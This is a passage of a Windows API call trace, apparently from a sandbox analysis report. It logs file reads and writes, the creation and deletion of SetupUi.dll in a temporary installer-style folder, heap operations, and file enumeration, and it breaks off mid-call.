lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.516] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.516] SetLastError (dwErrCode=0x0) [0080.516] SetLastError (dwErrCode=0x0) [0080.516] SetLastError (dwErrCode=0x0) [0080.516] SetLastError (dwErrCode=0x0) [0080.516] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.516] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.516] SetLastError (dwErrCode=0x0) [0080.517] SetLastError (dwErrCode=0x0) [0080.517] SetLastError (dwErrCode=0x0) [0080.517] SetLastError (dwErrCode=0x0) [0080.517] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.517] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.517] SetLastError (dwErrCode=0x0) [0080.517] SetLastError (dwErrCode=0x0) [0080.517] SetLastError (dwErrCode=0x0) [0080.517] SetLastError (dwErrCode=0x0) [0080.517] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.517] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.517] SetLastError (dwErrCode=0x0) [0080.517] SetLastError (dwErrCode=0x0) [0080.517] SetLastError (dwErrCode=0x0) [0080.517] SetLastError (dwErrCode=0x0) [0080.517] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.518] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.518] SetLastError (dwErrCode=0x0) [0080.518] SetLastError (dwErrCode=0x0) [0080.518] SetLastError (dwErrCode=0x0) [0080.518] SetLastError (dwErrCode=0x0) [0080.518] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.518] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.518] SetLastError (dwErrCode=0x0) [0080.518] SetLastError (dwErrCode=0x0) [0080.518] SetLastError (dwErrCode=0x0) [0080.518] SetLastError (dwErrCode=0x0) [0080.518] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.518] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.519] SetLastError (dwErrCode=0x0) [0080.519] SetLastError (dwErrCode=0x0) [0080.519] SetLastError (dwErrCode=0x0) [0080.519] SetLastError (dwErrCode=0x0) [0080.519] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.519] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.519] SetLastError (dwErrCode=0x0) [0080.519] SetLastError (dwErrCode=0x0) [0080.519] SetLastError (dwErrCode=0x0) [0080.519] SetLastError (dwErrCode=0x0) [0080.519] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.519] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.519] SetLastError (dwErrCode=0x0) [0080.519] SetLastError (dwErrCode=0x0) [0080.520] SetLastError (dwErrCode=0x0) [0080.520] SetLastError (dwErrCode=0x0) [0080.520] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.520] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.520] SetLastError (dwErrCode=0x0) [0080.520] SetLastError (dwErrCode=0x0) [0080.520] SetLastError (dwErrCode=0x0) [0080.520] SetLastError (dwErrCode=0x0) [0080.520] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.520] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.520] SetLastError (dwErrCode=0x0) [0080.520] SetLastError (dwErrCode=0x0) [0080.520] SetLastError (dwErrCode=0x0) [0080.520] SetLastError (dwErrCode=0x0) [0080.520] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.520] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.521] SetLastError (dwErrCode=0x0) [0080.521] SetLastError (dwErrCode=0x0) [0080.521] SetLastError (dwErrCode=0x0) [0080.521] SetLastError (dwErrCode=0x0) [0080.521] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.521] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.521] SetLastError (dwErrCode=0x0) [0080.521] SetLastError (dwErrCode=0x0) [0080.521] SetLastError (dwErrCode=0x0) [0080.521] SetLastError (dwErrCode=0x0) [0080.521] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.521] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.521] SetLastError (dwErrCode=0x0) [0080.522] SetLastError (dwErrCode=0x0) [0080.522] SetLastError (dwErrCode=0x0) [0080.522] SetLastError (dwErrCode=0x0) [0080.522] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.522] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.522] SetLastError (dwErrCode=0x0) [0080.522] SetLastError (dwErrCode=0x0) [0080.522] SetLastError (dwErrCode=0x0) [0080.522] SetLastError (dwErrCode=0x0) [0080.522] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.522] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.522] SetLastError (dwErrCode=0x0) [0080.522] SetLastError (dwErrCode=0x0) [0080.522] SetLastError (dwErrCode=0x0) [0080.522] SetLastError (dwErrCode=0x0) [0080.522] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.522] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.523] SetLastError (dwErrCode=0x0) [0080.523] SetLastError (dwErrCode=0x0) [0080.523] SetLastError (dwErrCode=0x0) [0080.523] SetLastError (dwErrCode=0x0) [0080.523] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.523] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.523] SetLastError (dwErrCode=0x0) [0080.523] SetLastError (dwErrCode=0x0) [0080.523] SetLastError (dwErrCode=0x0) [0080.523] SetLastError (dwErrCode=0x0) [0080.523] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.523] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.523] SetLastError (dwErrCode=0x0) [0080.523] SetLastError (dwErrCode=0x0) [0080.524] SetLastError (dwErrCode=0x0) [0080.524] SetLastError (dwErrCode=0x0) [0080.524] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.524] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.524] SetLastError (dwErrCode=0x0) [0080.524] SetLastError (dwErrCode=0x0) [0080.524] SetLastError (dwErrCode=0x0) [0080.524] SetLastError (dwErrCode=0x0) [0080.524] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.524] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.524] SetLastError (dwErrCode=0x0) [0080.524] SetLastError (dwErrCode=0x0) [0080.524] SetLastError (dwErrCode=0x0) [0080.524] SetLastError (dwErrCode=0x0) [0080.524] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.524] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.525] SetLastError (dwErrCode=0x0) [0080.525] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.525] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.525] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.525] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.526] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.526] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.526] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.527] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.527] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.527] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.527] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.527] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.527] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.527] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.528] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.528] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.528] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x150, lpOverlapped=0x0) returned 1 [0080.528] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0080.528] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.528] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0x150, lpOverlapped=0x0) returned 1 [0080.528] CloseHandle (hObject=0x42c) returned 1 [0080.535] CloseHandle (hObject=0x428) returned 1 [0080.535] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0080.538] GetFileType (hFile=0x428) returned 0x1 [0080.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0080.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0080.539] GetLastError () returned 0xb7 [0080.539] SetLastError (dwErrCode=0xb7) [0080.539] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0080.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0080.540] CloseHandle (hObject=0x428) returned 1 [0080.540] AreFileApisANSI () returned 1 [0080.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68d60 [0080.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll") returned 34 [0080.540] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll")) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0080.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0080.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.707] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0080.707] RtlAllocateHeap 